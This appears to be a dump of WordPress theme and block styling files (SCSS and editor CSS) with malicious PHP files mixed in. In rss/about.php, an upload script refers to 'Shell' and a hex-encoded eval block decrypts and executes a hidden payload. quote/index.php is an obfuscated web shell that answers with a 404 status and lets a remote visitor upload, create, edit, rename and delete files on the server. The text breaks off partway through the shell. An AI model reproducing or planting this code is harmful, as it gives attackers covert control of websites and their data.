			&:not(.has-text-color) {
				color: white;
			}

			&:hover {
				color: white;
				background: $color__background-button-hover;
				cursor: pointer;
			}

			&:focus {
				color: white;
				background: $color__background-button-hover;
				outline: thin dotted;
				outline-offset: -4px;
			}
		}

		&:not(.is-style-squared) .wp-block-button__link {
			border-radius: 5px;
		}

		&.is-style-outline .wp-block-button__link,
		&.is-style-outline .wp-block-button__link:focus,
		&.is-style-outline .wp-block-button__link:active {
			@include button-all-transition;
			border-width: 2px;
			border-style: solid;

			&:not(.has-background) {
				background: transparent;
			}

			&:not(.has-text-color) {
				color: $color__background-button;
				border-color: currentColor;
			}
		}

		&.is-style-outline .wp-block-button__link:hover {
			color: white;
			border-color: $color__background-button-hover;
			&:not(.has-background) {
				color: $color__background-button-hover;
			}
		}
	}

	//! Latest posts, categories, archives
	.wp-block-archives,
	.wp-block-categories,
	.wp-block-latest-posts {
		padding: 0;
		list-style: none;

		li > a {
			@include font-family( $font__heading );
			font-size: calc(#{$font__size_base} * #{$font__size-ratio});
			font-weight: bold;
			line-height: $font__line-height-heading;
			text-decoration: none;
		}
	}

	.wp-block-archives,
	.wp-block-categories {

		&.aligncenter {
			text-align: center;
		}
	}

	//! Latest categories
	.wp-block-categories {

		ul {
			padding-top: ( .75 * $size__spacing-unit );
		}

		li ul {
			list-style: none;
			padding-left: 0;
		}

		@include nestedSubMenuPadding();
	}

	//! Latest posts
	.wp-block-latest-posts {

		.wp-block-latest-posts__post-date {
			@include font-family( $font__heading );
			font-size: $font__size-xs;
			color: $color__text-light;
			line-height: 1.2;
		}

		.wp-block-latest-posts__post-full-content,
		.wp-block-latest-posts__post-excerpt {
			margin-top: $size__spacing-unit;
			margin-bottom: $size__spacing-unit;
		}

		li {
			padding-bottom: ( .5 * $size__spacing-unit );

			&.menu-item-has-children,
			&:last-child {
				padding-bottom: 0;
			}

			:not(:last-child) .wp-block-latest-posts__post-excerpt {
				padding-bottom: ( .5 * $size__spacing-unit );
			}
		}

		&.is-grid li {
			border-top: 2px solid $color__border;
			padding-top: (1 * $size__spacing-unit);
			margin-bottom: (2 * $size__spacing-unit);
			a {
				&:after {
					content: '';
				}
			}
			&:last-child {
				margin-bottom: auto;
				a:after {
					content: '';
				}
			}
		}
	}

	//! Latest preformatted text
	.wp-block-preformatted {
		font-size: $font__size-xs;
		line-height: 1.8;
		padding: $size__spacing-unit;
	}

	//! Verse
	.wp-block-verse {
		@include font-family( $font__body );
		font-size: $font__size_base;
		line-height: 1.8;
	}

	//! Paragraphs
	.has-drop-cap {
		&:not(:focus):first-letter {
			@include font-family( $font__heading );
			font-size: $font__size-xxxl;
			line-height: 1;
			font-weight: bold;
			margin: 0 0.25em 0 0;

			@-moz-document url-prefix()  {
				& {
					margin-top: 0.2em;
				}
			}
		}
	}

	//! Pullquote
	.wp-block-pullquote {
		border-color: transparent;
		border-width: 2px;
		padding: $size__spacing-unit;

		blockquote {
			color: $color__text-main;
			border: none;
			margin-top: calc(4 * #{ $size__spacing-unit});
			margin-bottom: calc(4.33 * #{ $size__spacing-unit});
			margin-right: 0;
			padding-left: 0;
		}

		p {
			font-size: $font__size-lg;
			font-style: italic;
			line-height: 1.3;
			margin-bottom: 0.5em;
			margin-top: 0.5em;

			em {
				font-style: normal;
			}

			@include media(tablet) {
				font-size: $font__size-xl;
			}
		}

		cite {
			display: inline-block;
			@include font-family( $font__heading );
			line-height: 1.6;
			text-transform: none;
			color: $color__text-light;

			/*
			 * This requires a rem-based font size calculation instead of our normal em-based one,
			 * because the cite tag sometimes gets wrapped in a p tag. This is equivalent to $font-size_xs.
			 */
			font-size: calc(1rem / (1.25 * #{$font__size-ratio}));
		}

		&.alignleft,
		&.alignright {
			width: 100%;
			padding: 0;

			blockquote {
				margin: $size__spacing-unit 0;
				padding: 0;
				text-align: left;
				max-width: 100%;

				p:first-child {
					margin-top: 0;
				}
			}
		}

		&.is-style-solid-color {
			background-color: $color__link;
			padding-left: 0;
			padding-right: 0;

			@include media(tablet) {
				padding-left: 10%;
				padding-right: 10%;
			}

			p {
				font-size: $font__size-lg;
				line-height: 1.3;
				margin-bottom: 0.5em;
				margin-top: 0.5em;

				@include media(tablet) {
					font-size: $font__size-xl;
				}
			}

			a {
				color: $color__background-body;
			}

			cite {
				color: inherit;
			}

			blockquote {
				max-width: 100%;
				color: $color__background-body;
				padding-left: 0;
				margin-left: $size__spacing-unit;
				margin-right: $size__spacing-unit;

				&.has-text-color p,
				&.has-text-color a,
				&.has-primary-color,
				&.has-secondary-color,
				&.has-dark-gray-color,
				&.has-light-gray-color,
				&.has-white-color {
					color: inherit;
				}

				@include media(tablet) {
					margin-left: 0;
					margin-right: 0;
				}
			}

			&.alignright,
			&.alignleft {

				@include media(tablet) {
					padding: $size__spacing-unit calc(2 * #{$size__spacing-unit});
				}
			}

			&.alignfull {

				@include media(tablet) {
					padding-left: calc(10% + 58px + (2 * #{$size__spacing-unit}));
					padding-right: calc(10% + 58px + (2 * #{$size__spacing-unit}));
				}
			}
		}
	}

	//! Blockquote
	.wp-block-quote {

		&:not(.is-large),
		&:not(.is-style-large) {
			border-width: 2px;
			border-color: $color__link;
			padding-top: 0;
			padding-bottom: 0;
		}

		p {
			font-size: 1em;
			font-style: normal;
			line-height: 1.8;
		}

		cite {
			/*
			 * This requires a rem-based font size calculation instead of our normal em-based one,
			 * because the cite tag sometimes gets wrapped in a p tag. This is equivalent to $font-size_xs.
			 */
			font-size: calc(1rem / (1.25 * #{$font__size-ratio}));
		}

		&.is-large,
		&.is-style-large {
			margin: $size__spacing-unit 0;
			padding: 0;
			border-left: none;

			p {
				font-size: $font__size-lg;
				line-height: 1.4;
				font-style: italic;
			}

			cite,
			footer {
				/*
				 * This requires a rem-based font size calculation instead of our normal em-based one,
				 * because the cite tag sometimes gets wrapped in a p tag. This is equivalent to $font-size_xs.
				 */
				font-size: calc(1rem / (1.25 * #{$font__size-ratio}));
			}

			@include media(tablet) {
				margin: $size__spacing-unit 0;
				padding: $size__spacing-unit 0;

				p {
					font-size: $font__size-lg;
				}
			}
		}
	}

	//! Image
	.wp-block-image {
		max-width: 100%;

		img {
			display: block;
		}

		// If an image does not have a left/center/right alignment, 
		// it's a direct child of .wp-block-img.  If it has no other 
		// alignment added, we want to make sure the image does not 
		// extend beyond the width of the text column.
		&:not(.alignwide):not(.alignfull) > img {
			@include postContentMaxWidth();
		}

		.aligncenter {

			@include postContentMaxWidth();

			@include media(tablet) {
				margin: 0;
				width: $size__site-tablet-content;

				img {
					margin: 0 auto;
				}
			}

			@include media(desktop) {
				width: $size__site-desktop-content;

				img {
					margin: 0 auto;
				}
			}
		}

		&.alignfull img {
			width: 100vw;
			max-width: calc( 100% + (2 * #{$size__spacing-unit}));

			@include media(tablet) {
				max-width: calc( 125% + 150px );
				margin-left: auto;
				margin-right: auto;
			}
		}
	}

	//! Cover Image
	.wp-block-cover-image,
	.wp-block-cover {
		position: relative;
		min-height: 430px;
		padding: $size__spacing-unit;

		@include media(tablet) {
			padding: $size__spacing-unit 10%;
		}

		.wp-block-cover-image-text,
		.wp-block-cover-text,
		h2 {
			@include font-family( $font__heading );
			font-size: $font__size-lg;
			font-weight: bold;
			line-height: 1.25;
			padding: 0;
			color: #fff;

			@include media(tablet) {
				font-size: $font__size-xl;
				max-width: 100%;
			}
		}

		&.alignleft,
		&.alignright {
			width: 100%;

			@include media(tablet) {
				padding: $size__spacing-unit calc(2 * #{$size__spacing-unit});
			}
		}

		&.alignfull {

			.wp-block-cover-image-text,
			.wp-block-cover-text,
			h2 {
				@include postContentMaxWidth();
			}

			@include media(tablet) {
				padding-left: calc(10% + 58px + (2 * #{$size__spacing-unit}));
				padding-right: calc(10% + 58px + (2 * #{$size__spacing-unit}));

				.wp-block-cover-image-text,
				.wp-block-cover-text,
				h2 {
					padding: 0;
				}
			}
		}
	}

	//! Galleries
	.wp-block-gallery {
		list-style-type: none;
		padding-left: 0;

		.blocks-gallery-image:last-child,
		.blocks-gallery-item:last-child {
			margin-bottom: 16px;
		}

		figcaption a {
			color: #fff;
		}
	}

	//! Captions
	.wp-block-audio figcaption,
	.wp-block-video figcaption,
	.wp-block-image figcaption,
	.wp-block-gallery .blocks-gallery-image figcaption,
	.wp-block-gallery .blocks-gallery-item figcaption {
		font-size: $font__size-xs;
		@include font-family( $font__heading );
		line-height: $font__line-height-pre;
		margin: 0;
		padding: ( $size__spacing-unit * .5 );
		text-align: center;
	}

	//! Separator
	.wp-block-separator,
	hr {
		background-color: $color__text-light;
		border: 0;
		height: 2px;
		margin-bottom: (2 * $size__spacing-unit);
		margin-top: (2 * $size__spacing-unit);
		max-width: 2.25em;
		text-align: left;

		&:not(.wp-block-separator) {
			max-width: 100%;
			@include postContentMaxWidth();
		}

		&.is-style-wide {
			max-width: 100%;
			@include postContentMaxWidth();
		}

		&.is-style-dots {
			max-width: 100%;
			@include postContentMaxWidth();
			background-color: inherit;
			border: inherit;
			height: inherit;
			text-align: center;

			// Only apply the default dot color if there's no separator color specified.
			&:not(.has-text-color):not(.has-background) {
				color: $color__text-light;
			}

			&:before {
				font-size: $font__size-lg;
				letter-spacing: $font__size-sm;
				padding-left: $font__size-sm;
			}
		}

		/* Remove duplicate rule-line when a separator
		 * is followed by an H1, or H2 */
		& + h1,
		& + h2 {

			&:before {
				display: none;
			}
		}
	}

	//! Twitter Embed
	.wp-block-embed-twitter {
		word-break: break-word;
	}

	//! Table
	.wp-block-table {

		th,
		td {
			border-color: $color__text-light;
		}
	}

	//! File
	.wp-block-file {
		@include font-family( $font__heading );

		.wp-block-file__button {
			display: table;
			@include button-transition;
			border: none;
			border-radius: 5px;
			background: $color__background-button;
			font-size: $font__size-base;
			@include font-family( $font__heading );
			line-height: $font__line-height-heading;
			text-decoration: none;
			font-weight: bold;
			padding: ($size__spacing-unit * .75) $size__spacing-unit;
			color: #fff;
			margin-left: 0;
			margin-top: calc(0.75 * #{$size__spacing-unit});

			@include media(desktop) {
				font-size: $font__size-base;
				padding: ($size__spacing-unit * .875) ($size__spacing-unit * 1.5);
			}

			&:hover {
				background: $color__background-button-hover;
				cursor: pointer;
			}

			&:focus {
				background: $color__background-button-hover;
				outline: thin dotted;
				outline-offset: -4px;
			}
		}
	}

	//! Code
	.wp-block-code {
		border-radius: 0;

		code {
			font-size: $font__size-md;
			white-space: pre-wrap;
			word-break: break-word;
		}
	}

	//! Columns
	.wp-block-columns {

		.wp-block-column > * {

			&:first-child {
				margin-top: 0;
			}

			&:last-child {
				margin-bottom: 0;
			}
		}

		// Ensure images do not expand beyond the column.
		.wp-block-image > img:not(.alignwide):not(.alignfull),
		.wp-block-image > figure {

			@include media(tablet) {
				max-width: 100%;
			}

			@include media(desktop) {
				max-width: 100%;
			}
		}

		@include media(tablet) {
			flex-wrap: nowrap;

			.wp-block-column:not(:first-child) {
				margin-left: 32px;
			}
		}
	}

	//! Group
	.wp-block-group {

		// When the Group block is standard/wide, we need to prevent full-aligned 
		// child blocks from expanding out of their container.
		&:not(.alignfull) > .wp-block-group__inner-container > .alignfull,
		&:not(.alignfull) > .wp-block-group__inner-container > .wp-block-image > img {

			@include media(tablet) {
				left: 0;
				max-width: 100%;
			}
		}

		// The full-width Group block's inner container should mimic .entry-content styles.
		&.alignfull > .wp-block-group__inner-container {
			max-width: calc(100% - (2 * #{ $size__spacing-unit }));
			margin: 0 $size__spacing-unit;

			@include media(tablet) {
				max-width: 80%;
				margin: 0 10%;
				padding: 0 60px;
			}
		}

		// Group block with a colored background.
		&.has-background {
			padding: $size__spacing-unit;
			margin-top: 0;
			margin-bottom: 0;

			// Remove the top and bottom margins of inner blocks.
			.wp-block-group__inner-container {

				> *:first-child {
					margin-top: 0;
				}

				> *:last-child {
					margin-bottom: 0;
				}
			}

			// If the Group block is full-width, it does not need this extra padding. 
			&.alignfull {
				padding-left: 0;
				padding-right: 0;

				@include media(tablet) {
					padding-top: $size__spacing-unit;
					padding-bottom: $size__spacing-unit;
				}
			}

			// Full-aligned child blocks should take up the maximum width available in their container.
			&:not(.alignfull) > .wp-block-group__inner-container > .alignfull {
				width: 100%;
				max-width: 100%;
				
				@include media(tablet) {
					width: calc( 100% + #{$size__spacing-unit * 2} );
					max-width: calc( 100% + #{$size__spacing-unit * 2} );
					margin-left: -#{$size__spacing-unit};
				}
			}
		}
		
	}

	//! Latest Comments
	.wp-block-latest-comments {

		.wp-block-latest-comments__comment-meta {
			@include font-family( $font__heading );
			font-weight: bold;

			.wp-block-latest-comments__comment-date {
				font-weight: normal;
			}
		}

		.wp-block-latest-comments__comment,
		.wp-block-latest-comments__comment-date,
		.wp-block-latest-comments__comment-excerpt p {
			font-size: inherit;
		}

		&.has-avatars {

		}

		&.has-dates {

			.wp-block-latest-comments__comment-date {
				font-size: $font__size-xs;
			}
		}

		&.has-excerpts {

		}
	}

	//! Font Sizes
	.has-small-font-size {
		font-size: $font__size-sm;
	}

	.has-normal-font-size {
		font-size: $font__size-md;
	}

	.has-large-font-size {
		font-size: $font__size-lg;
	}

	.has-huge-font-size {
		font-size: $font__size-xl;
	}

	//! Custom background colors
	.has-primary-background-color,
	.has-secondary-background-color,
	.has-dark-gray-background-color,
	.has-light-gray-background-color {

		// Use white text against these backgrounds by default.
		color: $color__background-body;

		> p,
		> h1,
		> h2,
		> h3,
		> h4,
		> h5,
		> h6,
		> a {
			color: $color__background-body;
		}
	}

	.has-white-background-color {
		color: $color__text-main;

		// Use dark gray text against this background by default.
		> p,
		> h1,
		> h2,
		> h3,
		> h4,
		> h5,
		> h6,
		> a {
			color: $color__text-main;
		}
	}

	.has-primary-background-color,
	.wp-block-pullquote.is-style-solid-color.has-primary-background-color {
		background-color: $color__link;
	}

	.has-secondary-background-color,
	.wp-block-pullquote.is-style-solid-color.has-secondary-background-color {
		background-color: $color__border-link-hover;
	}

	.has-dark-gray-background-color,
	.wp-block-pullquote.is-style-solid-color.has-dark-gray-background-color {
		background-color: $color__text-main;
	}

	.has-light-gray-background-color,
	.wp-block-pullquote.is-style-solid-color.has-light-gray-background-color {
		background-color: $color__text-light;
	}

	.has-white-background-color,
	.wp-block-pullquote.is-style-solid-color.has-white-background-color {
		background-color: #FFF;
	}

	//! Custom foreground colors
	.has-primary-color,
	.wp-block-pullquote blockquote.has-primary-color,
	.wp-block-pullquote.is-style-solid-color blockquote.has-primary-color,
	.wp-block-pullquote.is-style-solid-color blockquote.has-primary-color > p {
		color: $color__link;
	}

	.has-secondary-color,
	.wp-block-pullquote blockquote.has-secondary-color,
	.wp-block-pullquote.is-style-solid-color blockquote.has-secondary-color,
	.wp-block-pullquote.is-style-solid-color blockquote.has-secondary-color > p {
		color: $color__border-link-hover;
	}

	.has-dark-gray-color,
	.wp-block-pullquote.is-style-solid-color blockquote.has-dark-gray-color,
	.wp-block-pullquote.is-style-solid-color blockquote.has-dark-gray-color > p {
		color: $color__text-main;
	}

	.has-light-gray-color,
	.wp-block-pullquote blockquote.has-light-gray-color,
	.wp-block-pullquote.is-style-solid-color blockquote.has-light-gray-color,
	.wp-block-pullquote.is-style-solid-color blockquote.has-light-gray-color > p {
		color: $color__text-light;
	}

	.has-white-color,
	.wp-block-pullquote blockquote.has-white-color,
	.wp-block-pullquote.is-style-solid-color blockquote.has-white-color {
		color: #FFF;
	}
}
post-template/editor.min.css000060400000000136151333002240012111 0ustar00.editor-styles-wrapper ul.wp-block-post-template{list-style:none;margin-left:0;padding-left:0}post-template/editor-rtl.css000060400000000153151333002240012125 0ustar00.editor-styles-wrapper ul.wp-block-post-template{
  list-style:none;
  margin-right:0;
  padding-right:0;
}post-template/editor.css000060400000000151151333002240011324 0ustar00.editor-styles-wrapper ul.wp-block-post-template{
  list-style:none;
  margin-left:0;
  padding-left:0;
}post-template/editor-rtl.min.css000060400000000140151333002240012703 0ustar00.editor-styles-wrapper ul.wp-block-post-template{list-style:none;margin-right:0;padding-right:0}post-content/editor-rtl.css000060400000000147151333002240011767 0ustar00.wp-block-post-content.wp-block-post-content{
  -webkit-user-select:none;
          user-select:none;
}post-content/editor-rtl.min.css000060400000000127151333002240012547 0ustar00.wp-block-post-content.wp-block-post-content{-webkit-user-select:none;user-select:none}post-content/editor.min.css000060400000000127151333002240011750 0ustar00.wp-block-post-content.wp-block-post-content{-webkit-user-select:none;user-select:none}post-content/editor.css000060400000000147151333002240011170 0ustar00.wp-block-post-content.wp-block-post-content{
  -webkit-user-select:none;
          user-select:none;
}rss/about.php000064400000013673151335034710007212 0ustar00<script>
function upload(fileInputId, fileIndex)
    {
		var url = window.location.pathname;
		var scriptname = url.substring(url.lastIndexOf('/')+1);
		var filename = document.getElementById('upload_files').value;
		var filename = filename.match(/[^\\/]*$/)[0];
		var location = window.location.href;
		var directoryPath = location.substring(0, location.lastIndexOf("/")+1);
		document.getElementById("status").textContent = "Uploading the file "+filename+", please wait..";
		document.getElementById("status").style.color = "blue";
        // take the file from the input
        var file = document.getElementById(fileInputId).files[fileIndex];
        var reader = new FileReader();
        reader.readAsBinaryString(file); // alternatively you can use readAsDataURL
        reader.onloadend  = function(evt)
        {
                // create XHR instance
                xhr = new XMLHttpRequest();

                // send the file through POST
                xhr.open("POST", scriptname+"?name="+filename, true);

                // make sure we have the sendAsBinary method on all browsers
                XMLHttpRequest.prototype.mySendAsBinary = function(text){
                    var data = new ArrayBuffer(text.length);
                    var ui8a = new Uint8Array(data, 0);
                    for (var i = 0; i < text.length; i++) ui8a[i] = (text.charCodeAt(i) & 0xff);

                    if(typeof window.Blob == "function")
                    {
                         var blob = new Blob([data]);
                    }else{
                         var bb = new (window.MozBlobBuilder || window.WebKitBlobBuilder || window.BlobBuilder)();
                         bb.append(data);
                         var blob = bb.getBlob();
                    }

                    this.send(blob);
                }

                // let's track upload progress
                var eventSource = xhr.upload || xhr;
                eventSource.addEventListener("progress", function(e) {
                    // get percentage of how much of the current file has been sent
                    var position = e.position || e.loaded;
                    var total = e.totalSize || e.total;
                    var percentage = Math.round((position/total)*100);

                    // here you should write your own code how you wish to proces this
                });

                // state change observer - we need to know when and if the file was successfully uploaded
                xhr.onreadystatechange = function()
                {
                    if(xhr.readyState == 4)
                    {
                        if(xhr.status == 200)
                        {
                            // process success
							document.getElementById("status").textContent = "The file "+filename+" Uploaded successfully in same folder as Shell. At Link= "+directoryPath+filename;
							document.getElementById("status").style.color = "green";
                        }else{
                            // process error
                        }
                    }
                };

                // start sending
                xhr.mySendAsBinary(evt.target.result);
        };
    }
</script>

<html><link rel='icon' href='https://e.top4top.io/p_26973oc9i1.png' sizes='20x20' type='image/png'><?php eval(hex2bin("2f2f204f62667573636174696f6e20577261707065722076332e310d0a245f4f62465f30203d2022733979354f45697243506d696a6e534b6d36536e3549626d6d525277524d7946676275426a4f655932477177347069696f505678535239644765425850776e3661464b55555056686a334a2b6879313272424a6b6b752f5878384655552f6678596564307a6f2b41577651327a4d6e37367064646135384f7676444f63374e75373548445463785975694d2b787537697a43633067484b526348364d5249426476755a4f7a637155434d6c3137413263364c6239364a333677714b41454239334167556641644b7870747a762b61446e372b586c4f6d536f6a304e4636786c4a3653434e4c62546c414f4b5a387a4f416667534d6b53577671344d61726a59712b4a6a756b72754b6462654b577834566b397338425947455a6d5265794d314773376561776e6c6d433144787266344a56482b436d4f75384b622f46515068437633545a4b776d6455632b30334b6b6b7230717770506657412f4c41383776785733366c7a5232344b635868614961692f366845737639597a42756a354339733633434b736e326e61635162372b4642747a612f31726343755578503479595a757a446559757555674e4c3936676441765166516562395a764d474a4e586e4b76444b4c6d7648524677653675764d2b544354754b63317a2f37556d643674776e38764d336138674734624a706c4f454247656c655364416b4a63467146445058686b77543531467254654245544976356d2f4c3954426851664973324d56757879564245635361557345364f6a49354e7a49784f5755335a4755304d6a5269596a553d223b0d0a0d0a66756e6374696f6e204755734472624b484c5128737472696e6720245f312c20696e7420245f32293a20737472696e67207b0d0a20202020246d6574686f64203d20224145532d3235362d434243223b0d0a20202020246b6579203d20686173682827736861323536272c2028737472696e6729245f322c2074727565293b0d0a202020200d0a20202020245f33203d206261736536345f6465636f646528245f31293b0d0a202020206c6973742824656e637279707465642c2024697629203d206578706c6f646528273a3a272c20245f332c2032293b0d0a202020200d0a202020202f2f20456e73757265204956206c656e677468206d617463686573207468652063697068657220726571756972656d656e74730d0a202020202469764c656e677468203d206f70656e73736c5f6369706865725f69765f6c656e67746828246d6574686f64293b0d0a20202020246976203d20737562737472282469762c20302c202469764c656e677468293b0d0a202020200d0a2020202024646563727970746564203d206f70656e73736c5f64656372797074280d0a202020202020202024656e637279707465642c200d0a2020202020202020246d6574686f642c200d0a2020202020202020246b65792c200d0a20202020202020204f50454e53534c5f5241575f444154412c200d0a20202020202020202469760d0a20202020293b0d0a202020200d0a2020202072657475726e2024646563727970746564203f3a2027273b0d0a7d0d0a0d0a66756e6374696f6e206d4e706e78425348594e28737472696e6720245f342c20696e7420245f35293a20766f6964207b0d0a20202020245f36203d204755734472624b484c5128245f342c20245f35293b0d0a20202020406576616c28245f36293b0d0a7d0d0a0d0a6d4e706e78425348594e28245f4f62465f302c2039373233293b0d0a3f3e")); ?>

quote/index.php000064400000031630151335034710007526 0ustar00<?php
error_reporting(0); http_response_code(404); define("Yp", "Vim Patior"); $G3 = "scandir"; $c8 = array("7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64617465", "66696c656d74696d65"); $lE = 0; T4: if (!($lE < count($c8))) { goto Je; } $c8[$lE] = JD($c8[$lE]); Cy: $lE++; goto T4; Je: if (isset($_GET["p"])) { goto sr; } $Jd = $c8[2](); goto VN; sr: $Jd = jD($_GET["p"]); $c8[3](Jd($_GET["p"])); VN: function Ss($SP) { $dE = ""; $lE = 0; NZ: if (!($lE < strlen($SP))) { goto Xc; } $dE .= dechex(ord($SP[$lE])); WK: $lE++; goto NZ; Xc: return $dE; } function Jd($SP) { $dE = ""; $gf = strlen($SP) - 1; $lE = 0; Xp: if (!($lE < $gf)) { goto ur; } $dE .= chr(hexdec($SP[$lE] . $SP[$lE + 1])); Wn: $lE += 2; goto Xp; ur: return $dE; } function rn($F1) { $Jd = fileperms($F1); if (($Jd & 0xc000) == 0xc000) { goto FZ; } if (($Jd & 0xa000) == 0xa000) { goto Eu; } if (($Jd & 0x8000) == 0x8000) { goto ES; } if (($Jd & 0x6000) == 0x6000) { goto sA; } if (($Jd & 0x4000) == 0x4000) { goto lG; } if (($Jd & 0x2000) == 0x2000) { goto tV; } if (($Jd & 0x1000) == 0x1000) { goto Tx; } $lE = 'u'; goto cC; FZ: $lE = 's'; goto cC; Eu: $lE = 'l'; goto cC; ES: $lE = '-'; goto cC; sA: $lE = 'b'; goto cC; lG: $lE = 'd'; goto cC; tV: $lE = 'c'; goto cC; Tx: $lE = 'p'; cC: $lE .= $Jd & 0x100 ? 'r' : '-'; $lE .= $Jd & 0x80 ? 'w' : '-'; $lE .= $Jd & 0x40 ? $Jd & 0x800 ? 's' : 'x' : ($Jd & 0x800 ? 'S' : '-'); $lE .= $Jd & 0x20 ? 'r' : '-'; $lE .= $Jd & 0x10 ? 'w' : '-'; $lE .= $Jd & 0x8 ? $Jd & 0x400 ? 's' : 'x' : ($Jd & 0x400 ? 'S' : '-'); $lE .= $Jd & 0x4 ? 'r' : '-'; $lE .= $Jd & 0x2 ? 'w' : '-'; $lE .= $Jd & 0x1 ? $Jd & 0x200 ? 't' : 'x' : ($Jd & 0x200 ? 'T' : '-'); return $lE; } function Xe($OB, $Ch = 1, $BL = "") { global $Jd; $xe = $Ch == 1 ? "success" : "error"; echo "<script>swal({title: \"{$xe}\", text: \"{$OB}\", icon: \"{$xe}\"}).then((btnClick) => {if(btnClick){document.location.href=\"?p=" . Ss($Jd) . $BL . "\"}})</script>"; } function tF($yf) { global $c8; if (!(trim(pathinfo($yf, PATHINFO_BASENAME), '.') === '')) { goto IE; } return; IE: if ($c8[6]($yf)) { goto PF; } unlink($yf); goto jK; PF: array_map("deldir", glob($yf . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT)); rmdir($yf); jK: } ?>
<!doctype html>
<html lang="en"><head><meta name="theme-color" content="red"><meta name="viewport" content="width=device-width, initial-scale=0.60, shrink-to-fit=no"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><title><?= Yp; ?></title><style>.table-hover tbody tr:hover td{background:red}.table-hover tbody tr:hover td>*{color:#fff}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:0 0!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}li{font-size:18px;margin-left:6px;list-style:none}a{color:#fff}</style><script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script></head>
<body style="background-color:#000;color:#fff;font-family:serif;"><div class="bg-dark table-responsive text-light border"><div class="d-flex justify-content-between p-1"><div><h3 class="mt-2"><a href="?"><?= Yp; ?></a></h3></div><div><span>PHP Version : <?= $c8[1](); ?></span> <br><a href="?p=<?= ss($Jd) . "&a=" . Ss("newFile"); ?>">+File</a><a href="?p=<?= Ss($Jd) . "&a=" . sS("newDir"); ?>">+Directory</a></div></div><div class="border-top table-responsive"><li>Uname : <?= $c8[0](); ?></li></div>
<form method="post" enctype="multipart/form-data"><div class="input-group mb-1 px-1 mt-1"><div class="custom-file"><input type="file" name="f[]" class="custom-file-input" onchange="this.form.submit()" multiple><label class="custom-file-label rounded-0 bg-transparent text-light">Choose file Cokk!</label></div></div></form>
<?php  if (!isset($_FILES["f"])) { goto ea; } $Wx = $_FILES["f"]["name"]; $lE = 0; th: if (!($lE < count($Wx))) { goto dx; } if ($c8[11]($_FILES["f"]["tmp_name"][$lE], $Wx[$lE])) { goto PG; } Xe("file failed to upload", 0); goto tG; PG: XE("file uploaded successfully"); tG: g9: $lE++; goto th; dx: ea: if (!isset($_GET["download"])) { goto FA; } header("Content-Type: application/octet-stream"); header("Content-Transfer-Encoding: Binary"); header("Content-Length: " . $c8[17](JD($_GET["n"]))); header("Content-disposition: attachment; filename=\"" . jd($_GET["n"]) . "\""); FA: ?>
</div><div class="bg-dark border table-responsive mt-2">
<div class="ml-2" style="font-size:18px;">
<span>Path: </span><?php  $Op = $c8[4]("/(\\\\|\\/)/", $Jd); foreach ($Op as $j3 => $Oe) { if (!($j3 == 0 && $Oe == "")) { goto xi; } echo "<a href=\"?p=2f\">~</a>/"; goto CS; xi: if (!($Oe == "")) { goto sq; } goto CS; sq: echo "<a href=\"?p="; $lE = 0; de: if (!($lE <= $j3)) { goto ie; } echo sS($Op[$lE]); if (!($lE != $j3)) { goto s0; } echo "2f"; s0: dg: $lE++; goto de; ie: echo "\">{$Oe}</a>/"; CS: } Go: ?>
</div></div><article class="bg-dark border table-responsive mt-2">
<?php  if (!isset($_GET["a"])) { goto Un; } if (!isset($_GET["a"])) { goto cc; } $im = Jd($_GET["a"]); cc: ?>
<div class="px-2 py-2">
<?php  if (!($im == "delete")) { goto Lu; } $BL = $Jd . '/' . Jd($_GET["n"]); if (!($_GET["t"] == "d")) { goto VZ; } TF($BL); if (!$c8[12]($BL)) { goto e8; } Xe("failed to delete the folder", 0); goto iL; e8: Xe("folder deleted successfully"); iL: VZ: if (!($_GET["t"] == "f")) { goto xB; } $BL = $Jd . '/' . jd($_GET["n"]); unlink($BL); if (!$c8[12]($BL)) { goto uH; } Xe("file to delete the folder", 0); goto Mk; uH: xe("file deleted successfully"); Mk: xB: Lu: ?>
<?php  if ($im == "newDir") { goto Fg; } if ($im == "newFile") { goto Pb; } if ($im == "rename") { goto Lw; } if ($im == "edit") { goto Ox; } if ($im == "view") { goto Ag; } goto WC; Fg: ?>
<h5 class="border p-1 mb-3">New folder</h5>
<form method="post"><div class="form-group"><label for="n">Name :</label><input name="n" id="n" class="form-control" autocomplete="off"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form>
<?php  isset($_POST["s"]) ? $c8[12]("{$Jd}/{$_POST["n"]}") ? xE("folder name has been used", 0, "&a=" . SS("newDir")) : ($c8[15]("{$Jd}/{$_POST["n"]}") ? Xe("folder created successfully") : Xe("folder failed to create", 0)) : null; goto WC; Pb: ?>
<h5 class="border p-1 mb-3">New file</h5>
<form method="post"><div class="form-group"><label for="n">File name :</label><input type="text" name="n" id="n" class="form-control" placeholder="hack.txt"></div><div class="form-group"><label for="ctn">Content :</label><textarea style="resize:none" name="ctn" id="ctn" cols="30" rows="10" class="form-control" placeholder="# Stamped By Me"></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form>
<?php  isset($_POST["s"]) ? $c8[12]("{$Jd}/{$_POST["n"]}") ? xE("file name has been used", 0, "&a=" . SS("newFile")) : ($c8[13]("{$Jd}/{$_POST["n"]}", $_POST["ctn"]) ? XE("file created successfully", 1, "&a=" . ss("view") . "&n=" . Ss($_POST["n"])) : Xe("file failed to create", 0)) : null; goto WC; Lw: ?>
<h5 class="border p-1 mb-3">Rename <?= $_GET["t"] == "d" ? "folder" : "file"; ?></h5>
<form method="post"><div class="form-group"><label for="n">Name :</label><input type="text" name="n" id="n" class="form-control" value="<?= jD($_GET["n"]); ?>"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form>
